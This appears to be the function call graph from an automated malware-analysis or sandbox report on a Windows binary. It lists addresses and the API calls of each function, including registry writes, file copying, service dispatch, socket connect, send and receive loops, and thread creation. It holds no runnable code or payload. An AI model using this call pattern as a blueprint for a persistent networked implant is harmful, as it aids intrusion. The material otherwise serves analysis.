40d823 RegCreateKeyExA 60628->60629 61543 2b95e5e RtlInitializeCriticalSection GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 61613 2b942c7 61543->61613 61545 2b95ecb GetTickCount 61546 2b959fa 59 API calls 61545->61546 61547 2b95ee8 GetVersionExA 61546->61547 61548 2b95f29 __cftoa_l 61547->61548 61549 2ba1fbc _malloc 59 API calls 61548->61549 61550 2b95f36 61549->61550 61551 2ba1fbc _malloc 59 API calls 61550->61551 61552 2b95f46 61551->61552 61553 2ba1fbc _malloc 59 API calls 61552->61553 61554 2b95f51 61553->61554 61555 2ba1fbc _malloc 59 API calls 61554->61555 61556 2b95f5c 61555->61556 61557 2ba1fbc _malloc 59 API calls 61556->61557 61558 2b95f67 61557->61558 61559 2ba1fbc _malloc 59 API calls 61558->61559 61560 2b95f72 61559->61560 61561 2ba1fbc _malloc 59 API calls 61560->61561 61562 2b95f7d 61561->61562 61563 2ba1fbc _malloc 59 API calls 61562->61563 61564 2b95f89 6 API calls 61563->61564 61565 2b95fd6 __cftoa_l 61564->61565 61566 2b95fef RtlEnterCriticalSection RtlLeaveCriticalSection 61565->61566 61567 2ba1fbc _malloc 59 API calls 61566->61567 61568 2b9602b 61567->61568 61569 2ba1fbc _malloc 59 API calls 61568->61569 61570 2b96039 61569->61570 61571 2ba1fbc _malloc 59 API calls 61570->61571 61572 2b96040 61571->61572 61573 2ba1fbc _malloc 59 API calls 61572->61573 61574 2b96061 QueryPerformanceCounter Sleep 61573->61574 61575 2ba1fbc _malloc 59 API calls 61574->61575 61576 2b96087 61575->61576 61577 2ba1fbc _malloc 59 API calls 61576->61577 61605 2b96097 __cftoa_l 61577->61605 61578 2b96104 Sleep 61579 2b9610a RtlEnterCriticalSection RtlLeaveCriticalSection 61578->61579 61579->61605 61580 2b9649e RtlEnterCriticalSection RtlLeaveCriticalSection 61581 2ba134c 66 API calls 61580->61581 61581->61605 61582 2ba134c 66 API calls 61582->61605 61583 2ba1fbc _malloc 59 API calls 61584 2b96540 RtlEnterCriticalSection RtlLeaveCriticalSection 61583->61584 61584->61605 61585 2b967f7 RtlEnterCriticalSection RtlLeaveCriticalSection 61585->61605 61586 
2b95c11 59 API calls 61586->61605 61587 2ba1428 _sprintf 79 API calls 61587->61605 61588 2b91ba7 210 API calls 61588->61605 61589 2b9695c RtlEnterCriticalSection 61590 2b96989 RtlLeaveCriticalSection 61589->61590 61589->61605 61591 2b93c67 72 API calls 61590->61591 61591->61605 61592 2ba1fbc _malloc 59 API calls 61592->61605 61593 2b93d7e 64 API calls 61593->61605 61594 2b9733f 89 API calls 61594->61605 61595 2ba1f84 _free 59 API calls 61595->61605 61596 2ba25f6 65 API calls _strtok 61596->61605 61597 2b99729 73 API calls 61597->61605 61598 2b98007 88 API calls 61598->61605 61599 2ba27c5 _Allocate 60 API calls 61599->61605 61600 2b973ee 71 API calls 61600->61605 61601 2ba1860 _swscanf 59 API calls 61601->61605 61602 2b933b2 86 API calls 61602->61605 61603 2b9873b 212 API calls 61603->61605 61604 2b99853 60 API calls 61604->61605 61605->61578 61605->61579 61605->61580 61605->61582 61605->61583 61605->61585 61605->61586 61605->61587 61605->61588 61605->61589 61605->61590 61605->61592 61605->61593 61605->61594 61605->61595 61605->61596 61605->61597 61605->61598 61605->61599 61605->61600 61605->61601 61605->61602 61605->61603 61605->61604 61605->61605 61606 2b95119 103 API calls 61605->61606 61607 2b9c11b 73 API calls 61605->61607 61608 2b99c13 210 API calls 61605->61608 61609 2b96774 Sleep 61605->61609 61611 2b9676f shared_ptr 61605->61611 61606->61605 61607->61605 61608->61605 61610 2ba0900 GetProcessHeap HeapFree 61609->61610 61610->61611 61611->61605 61611->61609 61612 2b94100 GetProcessHeap HeapFree 61611->61612 61612->61611 60631 402188 LoadLibraryExA 60632 401f20 60631->60632 60632->60631 60633 40dab3 60632->60633 60634 2bcca75 CloseHandle 60635 2bd4ca4 60634->60635 61614 401769 61615 40176e 61614->61615 61616 40dd78 CopyFileA 61615->61616 61617 40dee9 61618 40de86 61617->61618 61619 40df4c StartServiceCtrlDispatcherA 61617->61619 61618->61619 61620 40e028 lstrcmpiW 61619->61620 60636 2b963f5 60650 2b960f0 shared_ptr __cftoa_l 60636->60650 60637 2b96104 Sleep 
60638 2b9610a RtlEnterCriticalSection RtlLeaveCriticalSection 60637->60638 60638->60636 60639 2b9649e RtlEnterCriticalSection RtlLeaveCriticalSection 60734 2ba134c 60639->60734 60641 2ba134c 66 API calls 60641->60650 60644 2b967f7 RtlEnterCriticalSection RtlLeaveCriticalSection 60644->60650 60648 2b9695c RtlEnterCriticalSection 60649 2b96989 RtlLeaveCriticalSection 60648->60649 60648->60650 60801 2b93c67 60649->60801 60650->60637 60650->60638 60650->60639 60650->60641 60650->60644 60650->60648 60650->60649 60652 2ba1fbc _malloc 59 API calls 60650->60652 60656 2ba25f6 65 API calls _strtok 60650->60656 60662 2b99729 73 API calls 60650->60662 60668 2b9676f shared_ptr 60650->60668 60669 2b96774 Sleep 60650->60669 60672 2b95119 60650->60672 60701 2b99c13 60650->60701 60711 2b95c11 60650->60711 60715 2b9733f 60650->60715 60721 2b9c11b 60650->60721 60726 2b973ee 60650->60726 60744 2ba1fbc 60650->60744 60761 2ba1860 59 API calls _vscan_fn 60650->60761 60762 2ba1f84 60650->60762 60768 2ba27c5 60650->60768 60776 2b9873b 212 API calls __EH_prolog 60650->60776 60777 2b99853 60650->60777 60782 2b94100 GetProcessHeap HeapFree 60650->60782 60783 2ba1428 60650->60783 60792 2b91ba7 60650->60792 60808 2b93d7e 60650->60808 60815 2b933b2 86 API calls 60650->60815 60816 2b98007 88 API calls __EH_prolog 60650->60816 60652->60650 60656->60650 60662->60650 60668->60669 60781 2ba0900 GetProcessHeap HeapFree 60669->60781 60673 2b95123 __EH_prolog 60672->60673 60817 2b9fb20 60673->60817 60676 2b93c67 72 API calls 60677 2b9514a 60676->60677 60678 2b93d7e 64 API calls 60677->60678 60679 2b95158 60678->60679 60680 2b9733f 89 API calls 60679->60680 60681 2b9516c 60680->60681 60684 2b95322 shared_ptr 60681->60684 60821 2b99729 60681->60821 60684->60650 60685 2b951c4 60687 2b99729 73 API calls 60685->60687 60686 2b951f6 60688 2b99729 73 API calls 60686->60688 60690 2b951d4 60687->60690 60689 2b95207 60688->60689 60689->60684 60691 2b99729 73 API calls 60689->60691 60690->60684 60693 2b99729 73 API 
calls 60690->60693 60692 2b9524a 60691->60692 60692->60684 60695 2b99729 73 API calls 60692->60695 60694 2b952b4 60693->60694 60694->60684 60696 2b99729 73 API calls 60694->60696 60695->60690 60697 2b952da 60696->60697 60697->60684 60698 2b99729 73 API calls 60697->60698 60699 2b95304 60698->60699 60826 2b9bedd 60699->60826 60702 2b99c1d __EH_prolog 60701->60702 60918 2b9c0f2 72 API calls 60702->60918 60704 2b99c3e shared_ptr 60919 2ba1100 60704->60919 60706 2b99c55 60707 2b99c6b 60706->60707 60925 2b93fb0 68 API calls Mailbox 60706->60925 60707->60650 60709 2b99c61 60926 2b9968f 60 API calls 4 library calls 60709->60926 60713 2b95c17 60711->60713 60712 2ba1fbc _malloc 59 API calls 60712->60713 60713->60712 60714 2b95c96 60713->60714 60716 2b97378 60715->60716 60717 2b97357 60715->60717 60720 2b9739d 60716->60720 61202 2b92ac7 60716->61202 61199 2b98601 60717->61199 60720->60650 60722 2b9fb20 Mailbox 68 API calls 60721->60722 60724 2b9c131 60722->60724 60723 2b9c21f 60723->60650 60724->60723 60725 2b92db5 73 API calls 60724->60725 60725->60724 60727 2b97409 WSASetLastError shutdown 60726->60727 60728 2b973f9 60726->60728 60730 2b9950d 69 API calls 60727->60730 60729 2b9fb20 Mailbox 68 API calls 60728->60729 60731 2b973fe 60729->60731 60732 2b97426 60730->60732 60731->60650 60732->60731 60733 2b9fb20 Mailbox 68 API calls 60732->60733 60733->60731 60735 2ba1358 60734->60735 60736 2ba137b 60734->60736 60735->60736 60737 2ba135e 60735->60737 61257 2ba1393 66 API calls 5 library calls 60736->61257 61255 2ba4acb 59 API calls __getptd_noexit 60737->61255 60740 2ba138e 60740->60650 60741 2ba1363 61256 2ba3b65 9 API calls _vscan_fn 60741->61256 60743 2ba136e 60743->60650 60745 2ba2037 60744->60745 60753 2ba1fc8 60744->60753 61264 2ba6e73 RtlDecodePointer 60745->61264 60747 2ba203d 61265 2ba4acb 59 API calls __getptd_noexit 60747->61265 60750 2ba1ffb RtlAllocateHeap 60750->60753 60760 2b96540 RtlEnterCriticalSection RtlLeaveCriticalSection 60750->60760 60752 2ba2023 61262 
2ba4acb 59 API calls __getptd_noexit 60752->61262 60753->60750 60753->60752 60757 2ba2021 60753->60757 60758 2ba1fd3 60753->60758 61261 2ba6e73 RtlDecodePointer 60753->61261 61263 2ba4acb 59 API calls __getptd_noexit 60757->61263 60758->60753 61258 2ba7291 59 API calls 2 library calls 60758->61258 61259 2ba72ee 59 API calls 8 library calls 60758->61259 61260 2ba6eda GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 60758->61260 60760->60650 60761->60650 60763 2ba1f8d HeapFree 60762->60763 60767 2ba1fb6 _free 60762->60767 60764 2ba1fa2 60763->60764 60763->60767 61266 2ba4acb 59 API calls __getptd_noexit 60764->61266 60766 2ba1fa8 GetLastError 60766->60767 60767->60650 60770 2ba27cd 60768->60770 60769 2ba1fbc _malloc 59 API calls 60769->60770 60770->60769 60771 2ba27e7 60770->60771 60773 2ba27eb std::exception::exception 60770->60773 61267 2ba6e73 RtlDecodePointer 60770->61267 60771->60650 61268 2ba31ca RaiseException 60773->61268 60775 2ba2815 60776->60650 60778 2b9985d __EH_prolog 60777->60778 61269 2b9d004 60778->61269 60780 2b9987b shared_ptr 60780->60650 60781->60650 60782->60650 60784 2ba1459 60783->60784 60785 2ba1444 60783->60785 60784->60785 60788 2ba1460 60784->60788 61273 2ba4acb 59 API calls __getptd_noexit 60785->61273 60787 2ba1449 61274 2ba3b65 9 API calls _vscan_fn 60787->61274 60790 2ba1454 60788->60790 61275 2ba4b71 79 API calls 4 library calls 60788->61275 60790->60650 61276 2bb2a10 60792->61276 60794 2b91bb1 RtlEnterCriticalSection 60795 2b91be9 RtlLeaveCriticalSection 60794->60795 60797 2b91bd1 60794->60797 61277 2b9d334 60795->61277 60797->60795 60798 2b91c55 RtlLeaveCriticalSection 60797->60798 60798->60650 60799 2b91c22 60799->60798 60802 2b9fb20 Mailbox 68 API calls 60801->60802 60803 2b93c7e 60802->60803 61340 2b93ca2 60803->61340 60809 2b93d99 htons 60808->60809 60810 2b93dcb htons 60808->60810 61369 2b93bd3 60 API calls 2 library calls 60809->61369 61370 2b93c16 60 API calls 2 library calls 60810->61370 60813 2b93db7 htonl 
htonl 60814 2b93ded 60813->60814 60814->60650 60815->60650 60816->60650 60818 2b9fb49 60817->60818 60819 2b9513d 60817->60819 60831 2ba23b4 60818->60831 60819->60676 60822 2b9fb20 Mailbox 68 API calls 60821->60822 60824 2b99743 60822->60824 60823 2b9519d 60823->60684 60823->60685 60823->60686 60824->60823 60875 2b92db5 60824->60875 60827 2b9fb20 Mailbox 68 API calls 60826->60827 60828 2b9bef7 60827->60828 60829 2b9c006 60828->60829 60902 2b92b95 60828->60902 60829->60684 60834 2ba22b8 60831->60834 60833 2ba23bf 60833->60819 60835 2ba22c4 __ioinit 60834->60835 60842 2ba7150 60835->60842 60841 2ba22eb __ioinit 60841->60833 60859 2ba74ab 60842->60859 60844 2ba22cd 60845 2ba22fc RtlDecodePointer RtlDecodePointer 60844->60845 60846 2ba22d9 60845->60846 60847 2ba2329 60845->60847 60856 2ba22f6 60846->60856 60847->60846 60868 2ba7d1d 60 API calls 2 library calls 60847->60868 60849 2ba238c RtlEncodePointer RtlEncodePointer 60849->60846 60850 2ba233b 60850->60849 60851 2ba2360 60850->60851 60869 2ba76b9 62 API calls 2 library calls 60850->60869 60851->60846 60854 2ba237a RtlEncodePointer 60851->60854 60870 2ba76b9 62 API calls 2 library calls 60851->60870 60854->60849 60855 2ba2374 60855->60846 60855->60854 60871 2ba7159 60856->60871 60860 2ba74cf RtlEnterCriticalSection 60859->60860 60861 2ba74bc 60859->60861 60860->60844 60866 2ba7533 59 API calls 9 library calls 60861->60866 60863 2ba74c2 60863->60860 60867 2ba6ffd 59 API calls 3 library calls 60863->60867 60866->60863 60868->60850 60869->60851 60870->60855 60874 2ba7615 RtlLeaveCriticalSection 60871->60874 60873 2ba22fb 60873->60841 60874->60873 60876 2b92dca 60875->60876 60877 2b92de4 60875->60877 60879 2b9fb20 Mailbox 68 API calls 60876->60879 60878 2b92dfc 60877->60878 60880 2b92def 60877->60880 60889 2b92d39 WSASetLastError WSASend 60878->60889 60882 2b92dcf 60879->60882 60883 2b9fb20 Mailbox 68 API calls 60880->60883 60882->60824 60883->60882 60884 2b92e0c 60884->60882 60885 2b92e54 WSASetLastError select 
60884->60885 60887 2b9fb20 68 API calls Mailbox 60884->60887 60888 2b92d39 71 API calls 60884->60888 60899 2b9950d 60885->60899 60887->60884 60888->60884 60890 2b9950d 69 API calls 60889->60890 60891 2b92d6e 60890->60891 60892 2b92d82 60891->60892 60893 2b92d75 60891->60893 60895 2b9fb20 Mailbox 68 API calls 60892->60895 60898 2b92d7a 60892->60898 60894 2b9fb20 Mailbox 68 API calls 60893->60894 60894->60898 60895->60898 60896 2b92d9c 60896->60884 60897 2b9fb20 Mailbox 68 API calls 60897->60896 60898->60896 60898->60897 60900 2b9fb20 Mailbox 68 API calls 60899->60900 60901 2b99519 WSAGetLastError 60900->60901 60901->60884 60903 2b92bb1 60902->60903 60904 2b92bc7 60902->60904 60905 2b9fb20 Mailbox 68 API calls 60903->60905 60906 2b92bdf 60904->60906 60909 2b92bd2 60904->60909 60908 2b92bb6 60905->60908 60907 2b92be2 WSASetLastError WSARecv 60906->60907 60906->60908 60912 2b92d22 60906->60912 60914 2b92cbc WSASetLastError select 60906->60914 60916 2b9fb20 68 API calls Mailbox 60906->60916 60910 2b9950d 69 API calls 60907->60910 60908->60828 60911 2b9fb20 Mailbox 68 API calls 60909->60911 60910->60906 60911->60908 60917 2b91996 68 API calls __cinit 60912->60917 60915 2b9950d 69 API calls 60914->60915 60915->60906 60916->60906 60917->60908 60918->60704 60927 2ba23c9 60919->60927 60922 2ba1124 60922->60706 60923 2ba114d ResumeThread 60923->60706 60924 2ba1146 CloseHandle 60924->60923 60925->60709 60928 2ba23eb 60927->60928 60929 2ba23d7 60927->60929 60946 2ba762a 60928->60946 60967 2ba4acb 59 API calls __getptd_noexit 60929->60967 60932 2ba23dc 60968 2ba3b65 9 API calls _vscan_fn 60932->60968 60935 2ba2449 60936 2ba1f84 _free 59 API calls 60935->60936 60938 2ba244f 60936->60938 60940 2ba111b 60938->60940 60969 2ba4aaa 59 API calls 3 library calls 60938->60969 60940->60922 60940->60923 60940->60924 60943 2ba240e CreateThread 60943->60940 60945 2ba2441 GetLastError 60943->60945 61008 2ba2529 60943->61008 60945->60935 60949 2ba7631 60946->60949 60948 2ba23f8 60948->60935 
60952 2ba48ca 60948->60952 60949->60948 60951 2ba764f 60949->60951 60970 2bae9b8 60949->60970 60951->60948 60951->60949 60978 2ba80c5 Sleep 60951->60978 60981 2ba48e2 GetLastError 60952->60981 60954 2ba48d0 60956 2ba2405 60954->60956 60995 2ba6ffd 59 API calls 3 library calls 60954->60995 60957 2ba4951 60956->60957 60958 2ba495d __ioinit 60957->60958 60959 2ba74ab __lock 59 API calls 60958->60959 60960 2ba499a 60959->60960 61000 2ba49f2 60960->61000 60963 2ba74ab __lock 59 API calls 60964 2ba49bb ___addlocaleref 60963->60964 61003 2ba49fb 60964->61003 60966 2ba49e6 __ioinit 60966->60943 60967->60932 60968->60940 60969->60940 60971 2bae9c3 60970->60971 60976 2bae9de 60970->60976 60972 2bae9cf 60971->60972 60971->60976 60979 2ba4acb 59 API calls __getptd_noexit 60972->60979 60974 2bae9ee RtlAllocateHeap 60975 2bae9d4 60974->60975 60974->60976 60975->60949 60976->60974 60976->60975 60980 2ba6e73 RtlDecodePointer 60976->60980 60978->60951 60979->60975 60980->60976 60996 2ba7d8b 60981->60996 60983 2ba48f7 60984 2ba4945 SetLastError 60983->60984 60985 2ba762a __calloc_crt 56 API calls 60983->60985 60984->60954 60986 2ba490a 60985->60986 60986->60984 60999 2ba7daa TlsSetValue 60986->60999 60988 2ba491e 60989 2ba493c 60988->60989 60990 2ba4924 60988->60990 60991 2ba1f84 _free 56 API calls 60989->60991 60992 2ba4951 __initptd 56 API calls 60990->60992 60994 2ba4942 60991->60994 60993 2ba492c GetCurrentThreadId 60992->60993 60993->60984 60994->60984 60997 2ba7d9e 60996->60997 60998 2ba7da2 TlsGetValue 60996->60998 60997->60983 60998->60983 60999->60988 61006 2ba7615 RtlLeaveCriticalSection 61000->61006 61002 2ba49b4 61002->60963 61007 2ba7615 RtlLeaveCriticalSection 61003->61007 61005 2ba4a02 61005->60966 61006->61002 61007->61005 61009 2ba2532 __threadstartex@4 61008->61009 61010 2ba7d8b __threadstartex@4 TlsGetValue 61009->61010 61011 2ba2538 61010->61011 61012 2ba256b 61011->61012 61013 2ba253f __threadstartex@4 61011->61013 61041 2ba475f 59 API calls 6 library calls 
61012->61041 61040 2ba7daa TlsSetValue 61013->61040 61015 2ba2586 ___crtIsPackagedApp 61018 2ba259a 61015->61018 61024 2ba24d1 61015->61024 61017 2ba254e 61019 2ba2561 GetCurrentThreadId 61017->61019 61020 2ba2554 GetLastError RtlExitUserThread 61017->61020 61030 2ba2462 61018->61030 61019->61015 61020->61019 61025 2ba24da LoadLibraryExW GetProcAddress 61024->61025 61026 2ba2513 RtlDecodePointer 61024->61026 61027 2ba24fc 61025->61027 61028 2ba24fd RtlEncodePointer 61025->61028 61029 2ba2523 61026->61029 61027->61018 61028->61026 61029->61018 61031 2ba246e __ioinit 61030->61031 61032 2ba48ca FindHandlerForForeignException 59 API calls 61031->61032 61033 2ba2473 61032->61033 61042 2ba1170 61033->61042 61036 2ba2483 61037 2ba7954 __XcptFilter 59 API calls 61036->61037 61038 2ba2494 61037->61038 61040->61017 61041->61015 61060 2ba0620 61042->61060 61045 2ba11b8 TlsSetValue 61046 2ba11c0 61045->61046 61082 2b9cdb8 61046->61082 61051 2ba24a3 61052 2ba48e2 __getptd_noexit 59 API calls 61051->61052 61053 2ba24ac 61052->61053 61054 2ba24c7 RtlExitUserThread 61053->61054 61055 2ba24bb 61053->61055 61056 2ba24c0 61053->61056 61197 2ba25a6 LoadLibraryExW GetProcAddress RtlEncodePointer RtlDecodePointer 61055->61197 61198 2ba4894 59 API calls 2 library calls 61056->61198 61059 2ba24c6 61059->61054 61074 2ba0684 61060->61074 61061 2ba0700 61062 2ba0716 61061->61062 61064 2ba0713 CloseHandle 61061->61064 61098 2ba31bb 61062->61098 61063 2ba06de ResetEvent 61070 2ba06e5 61063->61070 61064->61062 61066 2ba07ac WaitForSingleObject 61066->61074 61067 2ba069c 61067->61063 61068 2ba06b5 OpenEventA 61067->61068 61105 2ba0c20 GetCurrentProcessId 61067->61105 61072 2ba06cf 61068->61072 61073 2ba06d7 61068->61073 61069 2ba072e 61069->61045 61069->61046 61106 2ba0860 CreateEventA CloseHandle SetEvent GetCurrentProcessId 61070->61106 61072->61073 61076 2ba06d4 CloseHandle 61072->61076 61073->61063 61073->61070 61074->61061 61074->61066 61074->61067 61077 2ba0780 CreateEventA 61074->61077 
61080 2ba079e CloseHandle 61074->61080 61107 2ba0c20 GetCurrentProcessId 61074->61107 61075 2ba06b2 61075->61068 61076->61073 61077->61074 61080->61074 61081 2ba06fd 61081->61061 61083 2b9cdda 61082->61083 61109 2b94d86 61083->61109 61084 2b9cddd 61086 2ba0f40 61084->61086 61087 2ba0f79 TlsGetValue 61086->61087 61097 2ba0f71 Mailbox 61086->61097 61087->61097 61088 2ba1016 61088->61051 61089 2ba0fed 61089->61088 61092 2ba100e GetProcessHeap HeapFree 61089->61092 61090 2ba0fc9 61091 2ba0620 17 API calls 61090->61091 61094 2ba0fd8 61091->61094 61092->61088 61093 2ba1059 GetProcessHeap HeapFree 61093->61097 61094->61089 61095 2ba0fe5 TlsSetValue 61094->61095 61095->61089 61096 2ba104b GetProcessHeap HeapFree 61096->61093 61097->61089 61097->61090 61097->61093 61097->61096 61099 2ba31c3 61098->61099 61100 2ba31c5 IsProcessorFeaturePresent 61098->61100 61099->61069 61102 2ba814f 61100->61102 61108 2ba80fe 5 API calls 2 library calls 61102->61108 61104 2ba8232 61104->61069 61105->61075 61106->61081 61107->61074 61108->61104 61110 2b94d90 __EH_prolog 61109->61110 61111 2b9fb20 Mailbox 68 API calls 61110->61111 61112 2b94da6 RtlEnterCriticalSection RtlLeaveCriticalSection 61111->61112 61113 2b950d4 shared_ptr 61112->61113 61126 2b94dd1 std::bad_exception::bad_exception 61112->61126 61113->61084 61115 2b950a1 RtlEnterCriticalSection RtlLeaveCriticalSection 61116 2b950b3 RtlEnterCriticalSection RtlLeaveCriticalSection 61115->61116 61116->61113 61116->61126 61117 2b99729 73 API calls 61117->61126 61119 2b94e8d RtlEnterCriticalSection RtlLeaveCriticalSection 61120 2b94e9f RtlEnterCriticalSection RtlLeaveCriticalSection 61119->61120 61120->61126 61121 2b9bedd 73 API calls 61121->61126 61126->61115 61126->61116 61126->61117 61126->61119 61126->61120 61126->61121 61129 2b94bed 61126->61129 61153 2b96d28 60 API calls 61126->61153 61154 2b9c00f 60 API calls 2 library calls 61126->61154 61155 2b96d02 60 API calls std::bad_exception::bad_exception 61126->61155 61156 2b999b6 60 API 
calls 2 library calls 61126->61156 61157 2b99a8e 210 API calls 3 library calls 61126->61157 61158 2ba0900 GetProcessHeap HeapFree 61126->61158 61159 2b94100 GetProcessHeap HeapFree 61126->61159 61130 2b94bf7 __EH_prolog 61129->61130 61131 2b91ba7 209 API calls 61130->61131 61132 2b94c31 61131->61132 61160 2b93a94 61132->61160 61134 2b94c3c 61135 2b93a94 60 API calls 61134->61135 61136 2b94c56 61135->61136 61163 2b975d6 61136->61163 61141 2b9fb20 Mailbox 68 API calls 61142 2b94cb8 61141->61142 61188 2b9b294 61142->61188 61144 2b94ce1 InterlockedExchange 61192 2b92995 95 API calls Mailbox 61144->61192 61146 2b94d3c 61196 2b9761f 75 API calls 2 library calls 61146->61196 61149 2b94d06 61149->61146 61193 2b97592 76 API calls Mailbox 61149->61193 61194 2b972fc 82 API calls Mailbox 61149->61194 61195 2b92995 95 API calls Mailbox 61149->61195 61150 2b94d57 shared_ptr 61150->61126 61153->61126 61154->61126 61155->61126 61156->61126 61157->61126 61158->61126 61159->61126 61161 2b939ee 60 API calls 61160->61161 61162 2b93ab5 61161->61162 61162->61134 61164 2b9fb20 Mailbox 68 API calls 61163->61164 61165 2b975ec 61164->61165 61166 2b98a25 77 API calls 61165->61166 61167 2b97606 61166->61167 61168 2b91712 60 API calls 61167->61168 61169 2b94c8b 61168->61169 61170 2b9d0fc 61169->61170 61171 2b9d106 __EH_prolog 61170->61171 61172 2b91a01 61 API calls 61171->61172 61173 2b9d11d 61172->61173 61174 2b9fb20 Mailbox 68 API calls 61173->61174 61176 2b9d15a 61173->61176 61174->61176 61175 2b9d168 InterlockedExchangeAdd 61177 2b9d18a 61175->61177 61178 2b9d195 RtlEnterCriticalSection 61175->61178 61176->61175 61180 2b91ec7 InterlockedIncrement PostQueuedCompletionStatus RtlEnterCriticalSection InterlockedExchange RtlLeaveCriticalSection 61177->61180 61179 2b96f5f 60 API calls 61178->61179 61181 2b9d1bb InterlockedIncrement 61179->61181 61182 2b9d193 61180->61182 61183 2b9d1cb 61181->61183 61184 2b9d1d2 RtlLeaveCriticalSection 61181->61184 61186 2b9d856 TlsGetValue 61182->61186 61185 
2b927f3 SetWaitableTimer 61183->61185 61184->61182 61185->61184 61187 2b94ca4 61186->61187 61187->61141 61189 2b9b2a7 61188->61189 61190 2b9b2d0 61189->61190 61191 2b9d9c5 83 API calls 61189->61191 61190->61144 61191->61190 61192->61149 61193->61149 61194->61149 61195->61149 61196->61150 61197->61056 61198->61059 61220 2b9353e 61199->61220 61203 2b92ae8 WSASetLastError connect 61202->61203 61204 2b92ad8 61202->61204 61206 2b9950d 69 API calls 61203->61206 61205 2b9fb20 Mailbox 68 API calls 61204->61205 61207 2b92add 61205->61207 61208 2b92b07 61206->61208 61210 2b9fb20 Mailbox 68 API calls 61207->61210 61208->61207 61209 2b9fb20 Mailbox 68 API calls 61208->61209 61209->61207 61211 2b92b1b 61210->61211 61212 2b9fb20 Mailbox 68 API calls 61211->61212 61214 2b92b38 61211->61214 61212->61214 61216 2b92b87 61214->61216 61253 2b93027 71 API calls Mailbox 61214->61253 61215 2b92b59 61215->61216 61254 2b92fb4 71 API calls Mailbox 61215->61254 61216->60720 61218 2b92b7a 61218->61216 61219 2b9fb20 Mailbox 68 API calls 61218->61219 61219->61216 61221 2b93548 __EH_prolog 61220->61221 61222 2b93557 61221->61222 61223 2b93576 61221->61223 61250 2b91996 68 API calls __cinit 61222->61250 61242 2b92edd WSASetLastError WSASocketA 61223->61242 61227 2b935ad CreateIoCompletionPort 61228 2b935db 61227->61228 61229 2b935c5 GetLastError 61227->61229 61231 2b9fb20 Mailbox 68 API calls 61228->61231 61230 2b9fb20 Mailbox 68 API calls 61229->61230 61232 2b935d2 61230->61232 61231->61232 61233 2b935ef 61232->61233 61234 2b93626 61232->61234 61235 2b9fb20 Mailbox 68 API calls 61233->61235 61252 2b9cef7 60 API calls 2 library calls 61234->61252 61236 2b93608 61235->61236 61251 2b929ee 76 API calls Mailbox 61236->61251 61239 2b93659 61241 2b9fb20 Mailbox 68 API calls 61239->61241 61240 2b9355f 61240->60716 61241->61240 61243 2b9fb20 Mailbox 68 API calls 61242->61243 61244 2b92f0a WSAGetLastError 61243->61244 61245 2b92f41 61244->61245 61246 2b92f21 61244->61246 61245->61227 61245->61240 61247 
2b92f3c 61246->61247 61248 2b92f27 setsockopt 61246->61248 61249 2b9fb20 Mailbox 68 API calls 61247->61249 61248->61247 61249->61245 61250->61240 61251->61240 61252->61239 61253->61215 61254->61218 61255->60741 61256->60743 61257->60740 61258->60758 61259->60758 61261->60753 61262->60757 61263->60760 61264->60747 61265->60760 61266->60766 61267->60770 61268->60775 61270 2b9d00e __EH_prolog 61269->61270 61271 2ba27c5 _Allocate 60 API calls 61270->61271 61272 2b9d025 61271->61272 61272->60780 61273->60787 61274->60790 61275->60790 61276->60794 61278 2b9d33e __EH_prolog 61277->61278 61279 2ba27c5 _Allocate 60 API calls 61278->61279 61280 2b9d347 61279->61280 61281 2b91bfa RtlEnterCriticalSection 61280->61281 61283 2b9d555 61280->61283 61281->60799 61284 2b9d55f __EH_prolog 61283->61284 61287 2b926db RtlEnterCriticalSection 61284->61287 61286 2b9d5b5 61286->61281 61288 2b92728 CreateWaitableTimerA 61287->61288 61289 2b9277e 61287->61289 61290 2b92738 GetLastError 61288->61290 61291 2b9275b SetWaitableTimer 61288->61291 61292 2b927d5 RtlLeaveCriticalSection 61289->61292 61294 2ba27c5 _Allocate 60 API calls 61289->61294 61293 2b9fb20 Mailbox 68 API calls 61290->61293 61291->61289 61292->61286 61295 2b92745 61293->61295 61296 2b9278a 61294->61296 61331 2b91712 61295->61331 61298 2b927c8 61296->61298 61299 2ba27c5 _Allocate 60 API calls 61296->61299 61337 2b96e07 CloseHandle 61298->61337 61301 2b927a9 61299->61301 61303 2b91cf8 CreateEventA 61301->61303 61304 2b91d23 GetLastError 61303->61304 61305 2b91d52 CreateEventA 61303->61305 61308 2b91d33 61304->61308 61306 2b91d6b GetLastError 61305->61306 61325 2b91d96 61305->61325 61310 2b91d7b 61306->61310 61307 2ba23c9 __beginthreadex 201 API calls 61311 2b91db6 61307->61311 61309 2b9fb20 Mailbox 68 API calls 61308->61309 61312 2b91d3c 61309->61312 61313 2b9fb20 Mailbox 68 API calls 61310->61313 61314 2b91e0d 61311->61314 61315 2b91dc6 GetLastError 61311->61315 61316 2b91712 60 API calls 61312->61316 61317 2b91d84 61313->61317 
61318 2b91e1d 61314->61318 61319 2b91e11 WaitForSingleObject CloseHandle 61314->61319 61320 2b91dd8 61315->61320 61321 2b91d4e 61316->61321 61322 2b91712 60 API calls 61317->61322 61318->61298 61319->61318 61323 2b91ddc CloseHandle 61320->61323 61324 2b91ddf 61320->61324 61321->61305 61322->61325 61323->61324 61326 2b91de9 CloseHandle 61324->61326 61327 2b91dee 61324->61327 61325->61307 61326->61327 61328 2b9fb20 Mailbox 68 API calls 61327->61328 61329 2b91dfb 61328->61329 61330 2b91712 60 API calls 61329->61330 61330->61314 61332 2b9171c __EH_prolog 61331->61332 61333 2b9173e 61332->61333 61338 2b91815 59 API calls std::exception::exception 61332->61338 61333->61291 61335 2b91732 61339 2b994a6 60 API calls 2 library calls 61335->61339 61337->61292 61338->61335 61351 2b930ae WSASetLastError 61340->61351 61343 2b930ae 71 API calls 61344 2b93c90 61343->61344 61345 2b916ae 61344->61345 61346 2b916b8 __EH_prolog 61345->61346 61347 2b91701 61346->61347 61367 2ba14e3 59 API calls std::exception::_Copy_str 61346->61367 61347->60650 61349 2b916dc 61368 2b994a6 60 API calls 2 library calls 61349->61368 61352 2b930ec WSAStringToAddressA 61351->61352 61353 2b930ce 61351->61353 61354 2b9950d 69 API calls 61352->61354 61353->61352 61355 2b930d3 61353->61355 61356 2b93114 61354->61356 61357 2b9fb20 Mailbox 68 API calls 61355->61357 61358 2b9311e _memcmp 61356->61358 61359 2b93154 61356->61359 61360 2b930d8 61357->61360 61361 2b93135 61358->61361 61364 2b9fb20 Mailbox 68 API calls 61358->61364 61359->61361 61362 2b9fb20 Mailbox 68 API calls 61359->61362 61360->61343 61360->61344 61363 2b9fb20 